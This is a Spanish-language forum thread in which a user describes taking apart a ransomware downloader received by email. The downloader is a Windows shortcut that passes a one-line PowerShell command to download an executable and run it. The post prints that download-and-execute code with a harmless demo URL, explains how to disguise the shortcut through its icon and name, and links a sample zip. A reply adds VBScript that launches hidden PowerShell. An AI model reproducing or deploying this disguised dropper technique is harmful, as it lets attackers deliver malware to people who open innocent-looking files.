Hola

Hace tiempo que no me paso por mi sección del foro favorita para compartir nuevas ideas... Recientemente ha llegado a mis manos un virus de tipo ramsonware oculto en un fichero zip (por e-mail), curiosamente mi antivirus no detectó la amenaza, así que me puse a destriparlo en mi VM.

El funcionamiento es muy básico, tras ejecutar el fichero que hay en el ZIP, se ejecuta un ejecutable EXE y se inicia la infección de los ficheros. Hasta aquí todo normal, excepto que el fichero ZIP ocupaba 1,26Kb (descomprimido eran 2Kb…) ¿Cómo podía un fichero de 2Kb cifrar de forma eficiente todos los fichero del disco? La respuesta era fácil, ese fichero de 2Kb no era el ramsonware, sino un pequeño fichero (downloader) que se descargaba una copia del EXE (ramsonware) desde internet y luego lo ejecutaba. Todo ello en un ficherito de 2Kb.

Tras mi análisis pude ver el truco, un simple acceso directo al proceso powershell.exe de Windows y una pequeña línea de código añadida como parámetro del propio acceso directo. Sublime!

El código para descargar y ejecutar un fichero desde internet en PowerShell sería el siguiente:

$c=$env:userprofile+'\tmp.exe';
(New-Object System.Net.WebClient).Downloadfile('https://live.sysinternals.com/procexp.exe',$c);
Start-Process $c

La primera línea define una variable $c con el valor de “C:\Users\usuario_actual\tmp.exe”
La segunda línea crea un nuevo objeto del tipo WebClient y llama a su función DownloadFile, indicando la ruta y el destino ($c)
La tercera línea ejecuta el fichero descargado $c usando Start-Process.

Todo ese código se puede escribir en una sola línea y enviarlo como argumento directamente al proceso powershell.exe usando un acceso directo:





Editando el icono y el nombre podremos disimular el downloader todavía más. Quedando un único fichero de apenas 2Kb completamente funcional.

Os dejo un ejemplo para que entendáis el proceso, es completamente inofensivo. Este acceso directo os descargará y ejecutará el programa ProcessExplorer.exe desde internet

http://www.mediafire.com/download/kj3mtepo8h6zypu/musica.zip

Saludos!!

Muy interesante MadAntrax. 

Esta interesante el tema me gusto

Lo puedo compartir en mi blog

Saludos

Oye Mad Antrax se supone que los script de powershell vienen des habilitados en windows y como esta eso de que con un acceso directo puedes ejecutar comandos powershell.

He estado travesiando y se pueden ejecutar comandos powershell desde vbs como lo muestro en este codigo

set shell=createobject("wscript.shell")
power="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command "
shell.run   power & "&{$bytes = [System.IO.File]::ReadAllBytes('e:\45.png');foreach ($b in $bytes){$code = $code + '==' + $b};[System.IO.File]::WriteAllLines('e:\logger.txt', $code)}",0
 

y desde un acceso directo con esta ruta


el codigo anterior lee un archivo binario  .png desde la unidad E:\

saludos Flamer y no entiendo por que des habilitan los script .ps1 si se pueden ejecutar comandos desde otra parte

tmp.exe es el nombre que le dio al ejecutable descargado Mad Antrax pero es opcional le puedes poner otro si quieres

saludos Flamer